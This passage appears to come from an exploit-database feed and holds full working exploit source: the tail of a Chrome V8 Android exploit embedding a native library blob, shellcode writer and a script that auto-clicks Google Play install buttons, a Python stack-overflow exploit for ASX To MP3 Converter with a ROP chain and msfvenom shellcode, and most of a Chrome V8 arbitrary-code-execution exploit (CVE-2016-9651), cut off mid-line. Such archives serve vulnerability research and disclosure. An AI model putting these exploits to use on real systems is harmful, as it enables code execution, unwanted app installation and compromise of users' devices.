c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\r\nvar arrayBuffer = new ArrayBuffer(0x1000000);\r\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\r\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\r\nvar args_address = backingStoreAddress+1024;\r\nfunction write_shellcode(dlsym_addr,buffer){\r\n //ldr r0,[pc,4]//0xe59f0004 \r\n //ldr r1,[pc,4]//0xe59f1004\r\n //b shellcode;//0xea000001\r\n //dlopen_addr//array_buffer_address\r\n //dlsym_addr\r\n //shellcode\r\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\r\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\r\n for(var i=0;i<stub.length;i++){\r\n globaldv[buffer/4+i]=stub[i];\r\n }\r\n \r\n shellcode = shellcode.concat([0,0,0,0]);\r\n for(var i=0;i<shellcode.length/4>>>0;i++){\r\n // u8arr[i+4*stub.length]=shellcode[i];\r\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\r\n }\r\n return stub.length*4+shellcode.length;\r\n}\r\n \r\nfunction xss_code(){\r\n //alert(navigator.userAgent);\r\n //alert(document.cookie);\r\n var i1=setInterval(function(){\r\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\r\n console.log(\"wait load complete\");\r\n return;\r\n }\r\n clearInterval(i1);\r\n var i2=setInterval(function(){\r\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\r\n var installButton = document.getElementById(\"purchase-ok-button\");\r\n if(installButton == null)\r\n return;\r\n installButton.click();\r\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\r\n clearInterval(i2);\r\n setTimeout(function(){\r\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\r\n },26000);\r\n },500);\r\n },500);\r\n}\r\n \r\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\r\n//var backup_arr = backup_original_code(huge_func_code_entry);\r\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\r\nvar args_view = new DataView(arrayBuffer,1024,100);\r\nvar so_file_view = new DataView(arrayBuffer,4096);\r\nvar js_view = new DataView(arrayBuffer,0x100000);\r\nargs_view.setUint32(0,dlsym_addr+0xc,true);\r\nargs_view.setUint32(4,dlsym_addr,true);\r\nargs_view.setUint32(8,huge_func_code_entry,true);\r\nargs_view.setUint32(12,writed_len,true);\r\nargs_view.setUint32(16,backingStoreAddress+4096,true);\r\nargs_view.setUint32(20,so_str.length/2,true);\r\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\r\nargs_view.setUint32(28,js_str.length,true);\r\nprint(\"length is \"+so_str.length);\r\nfor(var i=0;i<so_str.length;i+=2){\r\n var value = so_str.substr(i,2);\r\n value = \"0x\"+value;\r\n so_file_view.setUint8(i/2,parseInt(value));\r\n}\r\nfor(var i=0;i<js_str.length;i++){\r\n js_view.setUint8(i,js_str.charCodeAt(i));\r\n}\r\n \r\nprint(\"begin execute shellcode\");\r\nhuge_func({});\r\n \r\nprint(\"done\");\r\npostMessage(true);\r\n//prevent arrayBuffer to be released\r\nwhile(1){}\r\n \r\n}\r\n//main world\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");\r\n}\r\n \r\n// Build a worker from an anonymous function body\r\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\r\n \r\nvar worker;\r\nvar exploitSucc = false;\r\nvar count = 0;\r\nfunction startExploit(){\r\n print(\"worker thread is started\");\r\n worker = new Worker( blobURL );\r\n count++;\r\n worker.onmessage = function(e){\r\n print(\"exploit result is \"+e.data);\r\n exploitSucc = e.data;\r\n if(exploitSucc==false){\r\n startExploit();\r\n return;\r\n }\r\n var end = +new Date();\r\n print(\"time diff is \"+(end-begin)/1000);\r\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\r\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\r\n }\r\n}\r\nvar begin = +new Date();\r\nstartExploit();\r\n \r\nvar savedCount = 0;\r\nvar hangMonitor = setInterval(function (){\r\n if(exploitSucc==true){\r\n clearInterval(hangMonitor);\r\n }else{\r\n if(savedCount==count){//maybe hang\r\n print(\"worker maybe hange\");\r\n worker.terminate();\r\n startExploit();\r\n }else{\r\n print(\"worker is normal\");\r\n savedCount = count;\r\n }\r\n }\r\n},10000);\r\n//URL.revokeObjectURL( blobURL );\r\n \r\n \r\n</script>\r\n</html>\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/27954", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2017-10-11T22:38:48", "description": "", "published": "2017-10-09T00:00:00", "type": "packetstorm", "title": "ASX To MP3 Converter Stack Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15083"], "modified": "2017-10-09T00:00:00", "id": "PACKETSTORM:144558", "href": "https://packetstormsecurity.com/files/144558/ASX-To-MP3-Converter-Stack-Overflow.html", "sourceData": "`import struct,sys \nhead ='''<ASX version=\"3.0\"> \n<Entry> \n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_''' \n \n#offset 17375 \njunk = \"A\" *17375 \n \n#0x1003df8e \n#0x774e1035 \nEIP=\"\\x36\\x10\\x4e\\x77\" \n \nadjust=\"A\" *4 \n \ndef create_rop_chain(): \n \nrop_gadgets = [ \n0x73dd5dce, # POP EAX # RETN [MFC42.DLL] \n0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll] \n0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] \n0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL] \n0x7c96feb7, # POP EBP # RETN [ntdll.dll] \n0x7608fcec, # & push esp # ret [MSVCP60.dll] \n0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll] \n0xfffffdff, # Value to negate, will become 0x00000201 \n0x77d74960, # NEG EAX # RETN [USER32.dll] \n0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll] \n0x01d64827, # POP EAX # RETN [msvos.dll] \n0xffffffc0, # Value to negate, will become 0x00000040 \n0x77d74960, # NEG EAX # RETN [USER32.dll] \n0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll] \n0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll] \n0x77da1d04, # &Writable location [USER32.dll] \n0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll] \n0x76091182, # RETN (ROP NOP) [MSVCP60.dll] \n0x7d7da123, # POP EAX # RETN [WMVCore.DLL] \n0x90909090, # nop \n0x77195015, # PUSHAD # RETN [OLEAUT32.dll] \n] \nreturn ''.join(struct.pack('<I', _) for _ in rop_gadgets) \n \nrop_chain = create_rop_chain() \n \n#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b \"\\x00\\x0a\\x0d EXITFUNC=seh \n#badcharacters \"\\x00\\x0a\\x0d\" \n \nbuf = \"\" \nbuf += \"\\xda\\xd6\\xba\\xf5\\xa4\\x32\\xf4\\xd9\\x74\\x24\\xf4\\x5d\\x31\" \nbuf += \"\\xc9\\xb1\\x31\\x83\\xc5\\x04\\x31\\x55\\x14\\x03\\x55\\xe1\\x46\" \nbuf += \"\\xc7\\x08\\xe1\\x05\\x28\\xf1\\xf1\\x69\\xa0\\x14\\xc0\\xa9\\xd6\" \nbuf += \"\\x5d\\x72\\x1a\\x9c\\x30\\x7e\\xd1\\xf0\\xa0\\xf5\\x97\\xdc\\xc7\" \nbuf += \"\\xbe\\x12\\x3b\\xe9\\x3f\\x0e\\x7f\\x68\\xc3\\x4d\\xac\\x4a\\xfa\" \nbuf += \"\\x9d\\xa1\\x8b\\x3b\\xc3\\x48\\xd9\\x94\\x8f\\xff\\xce\\x91\\xda\" \nbuf += \"\\xc3\\x65\\xe9\\xcb\\x43\\x99\\xb9\\xea\\x62\\x0c\\xb2\\xb4\\xa4\" \nbuf += \"\\xae\\x17\\xcd\\xec\\xa8\\x74\\xe8\\xa7\\x43\\x4e\\x86\\x39\\x82\" \nbuf += \"\\x9f\\x67\\x95\\xeb\\x10\\x9a\\xe7\\x2c\\x96\\x45\\x92\\x44\\xe5\" \nbuf += \"\\xf8\\xa5\\x92\\x94\\x26\\x23\\x01\\x3e\\xac\\x93\\xed\\xbf\\x61\" \nbuf += \"\\x45\\x65\\xb3\\xce\\x01\\x21\\xd7\\xd1\\xc6\\x59\\xe3\\x5a\\xe9\" \nbuf += \"\\x8d\\x62\\x18\\xce\\x09\\x2f\\xfa\\x6f\\x0b\\x95\\xad\\x90\\x4b\" \nbuf += \"\\x76\\x11\\x35\\x07\\x9a\\x46\\x44\\x4a\\xf0\\x99\\xda\\xf0\\xb6\" \nbuf += \"\\x9a\\xe4\\xfa\\xe6\\xf2\\xd5\\x71\\x69\\x84\\xe9\\x53\\xce\\x74\" \nbuf += \"\\x1b\\x6e\\xda\\xe1\\x82\\x1b\\xa7\\x6f\\x35\\xf6\\xeb\\x89\\xb6\" \nbuf += \"\\xf3\\x93\\x6d\\xa6\\x71\\x96\\x2a\\x60\\x69\\xea\\x23\\x05\\x8d\" \nbuf += \"\\x59\\x43\\x0c\\xee\\x3c\\xd7\\xcc\\xdf\\xdb\\x5f\\x76\\x20\" \n \nshellcode=\"S\"*10+buf \n \nprint \"Length of shellcode is:\",len(shellcode) \nprint \"Length of ropchain is:\",len(rop_chain) \n \nprint\"Calculating Garbage:\",(26000-17375-4-4-len(shellcode)-len(rop_chain)) \n \ngarbage= \"C\" *8303 \n \nfoot ='''_playlis.wma\"/> \n</Entry> \n</ASX>''' \n \npayload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot \n \nfobj = open(\"exploit.asx\",\"w\") \nfobj.write(payload) \nfobj.close() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144558/asxmp3converter-overflow.txt"}, {"lastseen": "2017-06-15T04:21:23", "description": "", "published": "2017-06-14T00:00:00", "type": "packetstorm", "title": "Google Chrome V8 Private Property Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9651"], "modified": "2017-06-14T00:00:00", "id": "PACKETSTORM:142939", "href": "https://packetstormsecurity.com/files/142939/Google-Chrome-V8-Private-Property-Arbitrary-Code-Execution.html", "sourceData": "`<html> \n// Source: https://github.com/secmob/pwnfest2016/ \n<script> \nfunction exploit(){ \n \nfunction to_hex(num){ \nreturn (num>>>0).toString(16); \n} \nfunction intarray_to_double(int_arr){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \nuBuf[0]=int_arr[0]; \nuBuf[1]=int_arr[1]; \nreturn dBuf[0]; \n} \n \nfunction str_to_double(str){//leng of str must be 8 \nvar dBuf = new Float64Array(1); \nvar u8Buf = new Uint8Array(dBuf.buffer); \nfor(var i=0;i<str.length;i++){ \nu8Buf[i] = str.charCodeAt(i); \n} \nreturn dBuf[0]; \n} \nfunction double_to_array(value){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \ndBuf[0]=value; \nreturn uBuf; \n} \n \nfunction gc(){ \nfor(var i=0;i<0x100000/16;i++){ \nnew String; \n} \n} \nfunction getHiddenValue(){ \nvar obj = {}; \nvar oob = \"/re/\"; \n//oob = oob.replace(\"re\",\"*\".repeat(0x2000)); \noob = oob.replace(\"re\",\"*\".repeat(0x100000)); \nvar str = 'class x extends Array{'+oob+\"}\"; \nvar fun = eval(str); \nObject.assign(obj,fun); \nreturn obj; \n} \nvar obWin; \nfunction makeOobString(){ \nvar hiddenValue = getHiddenValue(); \nvar magicStr = \"bbbb\"; \nvar arr=[]; \nvar str = 'class x extends Array{}'; \nfor(var i=0;i<str.length;i++){ \narr[i]=str.charCodeAt(i); \n} \nvar ob = new Array(0x200); \nob.fill(0x31313131); \ngc(); \ngc(); \nstr=String.fromCharCode.apply(null,arr); \nob=ob.concat(0x32323232); \nvar fun = eval(str); \nob[2]=str; \nob[3]=ob; \nObject.assign(fun,hiddenValue); \nvar oobString = fun.toString(); \ngc(); \ngc(); \nprint(\"begin search\"); \nvar subStr = oobString.substr(0,0x8000); \nvar pos = subStr.indexOf(magicStr); \nprint(\"end search\"); \nif(pos==-1){ \nprint(\"find magic failed\"); \npostMessage(false); \nself.close(); \nprint(\"unpossible\"); \nthrow \"error\"; \n}else{ \nprint(\"find magic at \"+pos); \n \n} \noobString = oobString.substr(pos,ob.length*4); \nobWin=ob; \nreturn oobString; \n} \nvar oobString = makeOobString(); \nprint(\"get oob string successfully\"); \nfunction print(){ \nconsole.log.apply(null,arguments); \n/*document.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\");*/ \n} \nfunction str2arr(str,len){//len must be multile of 4 \nif(len===undefined) \nlen = str.length; \nvar u8a = new Uint8Array(len); \nfor(var i=0;i<len;i++){ \nu8a[i] = str.charCodeAt(i); \n} \nreturn new Uint32Array(u8a.buffer); \n} \nfunction pArrayInHex(arr){ \nvar result=\"<p style='font-size:8px'>\"; \nfor(var i=0;i<arr.length;i++){ \nresult+=(arr[i]+0x100000000).toString(16).substr(-8); \nresult+=\" \"; \nif(i%8==7) \nresult+=\"<p style='font-size:8px'>\"; \n} \nresult+=\"<p>\"; \nprint(result); \n//alert(result); \nreturn result; \n} \nfunction pStrInHex(str){ \n//var result=\"<p style='font-size:8px'>\"; \nvar result=\"\\n\"; \nfor(var i=0;i<str.length;i++){ \nvar code = str.charCodeAt(i); \nresult+=(code+0x100).toString(16).substr(-2); \nif(i%4==3) \nresult+=\" \"; \nif(i%32==31) \n// result+=\"<p style='font-size:8px'>\"; \nresult+=\"\\n\"; \n} \n// result+=\"<p>\"; \nresult+=\"\\n\"; \nprint(result); \nreturn result; \n} \nfunction getObjAddr(obj){ \nobWin[0]=obj; \nvar value2= ((str2arr(oobString,4))[0]); \nreturn value2>>>0; \n} \n \nvar getObj24BitsAddr = function(){ \nvar smi=0; \nvar code = 0; \nvar i=0; \n//don't allocate heap object \nfunction getAddr(obj){ \nobWin[0]=obj; \nvalue=0; \ncode = 0; \ni=0; \nfor(i=2;i>=0;i--){ \ncode = oobString.charCodeAt(i); \nvalue = code+value*256; \n} \nreturn value; \n} \nreturn getAddr; \n}(); \n \n \nvar lengthInOldSpace = 0xfffffffc; \nvar abarr=new Array(800); \nfunction sprayVM(){ \nvar i=0; \nvar j=0; \ntry{ \nfor(i=0;i<20;i++){ \nvar u8 = new Uint8Array(0x10000000-0x500); \nabarr[i]=u8; \n} \n}catch(e){} \ntry{ \nfor(j=0;j<100;j++){ \nvar u8 = new Uint8Array(0x8000000-0x500); \nabarr[i+j]=u8; \n} \n}catch(e){} \nprint(\"allocate \"+i+\" 256M \"+j+\" 16M \") \nfunction getRandomInt(min, max) { \nmin = Math.ceil(min); \nmax = Math.floor(max); \nreturn Math.floor(Math.random() * (max - min)) + min; \n} \ndelete abarr[getRandomInt(0,i)]; \n} \n \n \nfunction getNewSpaceAddrs(){ \n/*var kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\";*/ \nvar objsInNewSpace = new Array(80); \nfor(var i=0;i<objsInNewSpace.length;i++){ \n//var xx=escape(str); \nvar xx = new Array(0x70000/4); \nobjsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; \n//a1/2?newspaceae'c|>>aePS \nnew Uint8Array(0x100000-0x500); \nnew Uint8Array(0x100000-0x500); \n} \nfunction compareNumbers(a, b) { \nreturn a - b; \n} \nobjsInNewSpace = Array.from(new Set(objsInNewSpace)); \nobjsInNewSpace = objsInNewSpace.sort(compareNumbers); \nreturn objsInNewSpace; \n} \n \n \nprint(\"begin get new space address\"); \nvar objsInNewSpace = getNewSpaceAddrs(); \nwhile(objsInNewSpace.length<16){ \nobjsInNewSpace = getNewSpaceAddrs(); \nprint(\"new space addresses\"); \npArrayInHex(objsInNewSpace); \n} \n \ntry{ \nsprayVM(); \n}catch(e){} \n \nvar selectedTrunk = 0; \nvar selectedStr = \"\"; \nfunction bruteForceFengShui(){ \nvar huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000 \nhuge_str +=\"%\"; \nvar hold = new Array(100); \n//var holdaddress = new Array(100); \nfor(var i=0;;i++){ \nvar large = escape(huge_str); \nvar addr = getObjAddr(large); \n//console.log(addr.toString(16) + \" \"+i); \nif(i<hold.length){ \nhold[i]=large; \n//holdaddress[i]=addr; \n} \naddr=(addr&0xfff00000)>>>0; \naddr = addr-0x100000; \nif(objsInNewSpace.indexOf(addr)!=-1){ \nselectedTrunk = addr; \nselectedStr = large; \nabarr.fill(1); \nhold.fill(1); \n//holdaddress.fill(1); \nbreak; \n} \nif(i===150){ \n/*i=0; \nprint(\"tried 200 times\"); \nabarr.fill(1); \ntry{ \nsprayVM(); \n}catch(e){};*/ \npostMessage(false); \nclose(); \nthrow \"exceed limits\"; \n} \n} \n} \nbruteForceFengShui(); \n//to avoid allocate memory latter, initilize here \nvar nextTrunk = selectedTrunk + 0x100000; \n \n//caea,aeP3a$?a$?SSca-e->>aaa \nvar huge_str = \"eval('');\"; \n//8000a,e1/2a$?aa$?SSi1/4a$?aa$?SSa1/4a1/2?new_spaceaC/a$?SS \nfor(var i=0;i<8000;i++) huge_str += 'a.a;'; \nhuge_str += \"return 10;\"; \nvar huge_func = new Function('a',huge_str); \nhuge_func({}); \n \nfunction fillNewSpace(origObj){ \n//first object in new space at 0x8100, new spaces layout \n//0x40000 \n//0x37f00 \n//..... \n//0x40000 \nvar gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25 \nvar gap = gap+\"%\"; \n//flat gap \ngap.substr(0,100); \nvar fillstr = \"%20a\".repeat((0x40000-12)/4); \nfillstr = escape(fillstr); \nvar addr=0; \nfor(var i=0;i<0x100;i++){ \naddr = getObj24BitsAddr(origObj); \nif((addr&0xfffff)===0x8101) \norigObj=escape(gap); \nelse \norigObj=unescape(fillstr); \n} \n} \n \nfunction findNewSpace(){ \nvar kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\"; \nfor(var i=0;;i++){ \nvar xx=escape(str); \nvar straddr = getObjAddr(xx); \naddr=(straddr&0xfff00000)>>>0; \nif(addr===selectedTrunk){ \nprint(\"good state \"+straddr.toString(16)); \nbreak; \n} \n} \n} \n \nfunction myencode(str){ \nvar arr = []; \nfor(var i=0;i<str.length;i++){ \nif(i%2==1) \narr.push(str.charCodeAt(i)); \nelse{ \narr.push(37);//% \nvar hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); \narr.push(hexstr.charCodeAt(0)); \narr.push(hexstr.charCodeAt(1)); \n} \n} \nreturn String.fromCharCode.apply(null,arr); \n} \n \nvar dArray = []; \nvar index = (0x8100-36)*2; \nfor(var i=0;i<0x20000/8;i++){ \ndArray[i]=str_to_double(\"%03x%03x\"); \n} \n \nvar occulen = 0; \nvar i = 0; \nvar savedChunk = new Uint8Array(0x8100); \nvar hiddenValue = getHiddenValue(); \nvar arr=[]; \nfillNewSpace(new String); \nfindNewSpace(); \nvar classStr = 'class x extends Array{}'; \nfor(var i=0;i<classStr.length;i++){ \narr[i]=classStr.charCodeAt(i); \n} \nvar magicStr = String.fromCharCode(0x86,0x24); \nclassStr=String.fromCharCode.apply(null,arr); \nvar ab = new ArrayBuffer(0x1243); \nvar fun = eval(classStr); \nObject.assign(fun,hiddenValue); \nvar oobStr = fun.toString(); \n \n/*(gdb) x/20xw 0x5600c45c array buffer layout \n* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 \n* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 \n*/ \n//overwrite huge string as array buffer \nvar abLengthIndex = oobStr.indexOf(magicStr); \nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32); \n//replace the byteLength \nvar LengthAddr = getObjAddr(lengthInOldSpace); \nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); \nvar strBase = \"\\x00\\x00\\x00\\x00\"; \nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); \nstrArrayBuffer = myencode(strArrayBuffer); \nfor(var i=0;i<strArrayBuffer.length/8;i++){ \nvar d = strArrayBuffer.substr(i*8,8); \ndArray[index/8+i] = str_to_double(d); \n} \n \nvar classStrAddr = getObjAddr(classStr)>>>0; \n//set read position \nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head \n//length control the length of unscaped string, generated string has 12 bytes head \n//left 0x1000*2 bytes to avoid gc \nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); \n \n//save the the chunk head to be corrupted \nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; \nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); \nfor(var i =0;i<savedThunkStr.length;i++){ \nsavedChunk[i] = savedThunkStr.charCodeAt(i); \n} \n \nvar pos1=new String; \nvar pos1addr = getObj24BitsAddr(pos1)-1; \n \n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); \n//minus the length of double array \nif(occulen<0x40000+16+8) \nthrow \"no enough room\"; \nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray \nif(occulen%4!==0) \nthrow \"length don't align\"; \nvar arrocc=new Array((occulen/4)); \n//set unescape write position \nvar occDoubleArray = dArray.concat(); \n \nvar b=unescape(subOobStr); \n//restore the corrupted chunk head \nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); \nfor(var i=0;i<savedChunk.length;i++){ \nu8[i] = savedChunk[i]; \n} \n \nprint(\"long string allocated at \"+classStrAddr.toString(16)); \nif(typeof(selectedStr)===\"string\"){ \nprint(\"overwrite failed\"); \npostMessage(false); \nclose(); \nreturn; \n//throw \"overwrite failed\"; \n} \nvar fakeab = selectedStr; \nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16)); \nvar globaldv = new Uint32Array(fakeab); \n \nfunction read_uint32(from_address){ \nvar u32 = globaldv[(from_address/4)>>>0]; \nreturn u32>>>0; \n} \n \n \nfunction read_uint8(from_address){ \nfrom_address = from_address>>>0; \nvar index = (from_address/4)>>>0; \nvar mask = from_address%4; \nvar u32 = globaldv[index]; \nu32 = u32<<8*(3-mask); \nreturn u32>>>24; \n} \n \nfunction read_uint32_unalign(from_address){ \nvar u32 = 0; \nfor(var i=3;i>=0;i--){ \nvar u8 = read_uint8(from_address+i); \nu32 = u32*0x100+u8; \n} \nreturn u32>>>0; \n} \n \n//rw to execute \n//get function point of v8::internal::Accessors::ReconfigureToDataProperty \nfunction getFixedFunctionPoint(fakeab){ \nvar FunctionAddress = getObjAddr(Function); \nvar u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); \nvar map = u32[0]; \nu32 = new Uint32Array(fakeab,map-1,0x1000); \n//instance descriptors \nvar descriptors = u32[7]; \nu32 = new Uint32Array(fakeab,descriptors-1,0x1000); \nvar lengthAccessorInfo = u32[6]; \nu32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); \nvar setterForeign = u32[4]; \nu32 = new Uint32Array(fakeab,setterForeign-1,0x1000); \nvar functionPoint = u32[1]; \nreturn functionPoint-1; \n} \n \nvar funPoint = getFixedFunctionPoint(fakeab); \nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16)); \nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval \n \nvar point = 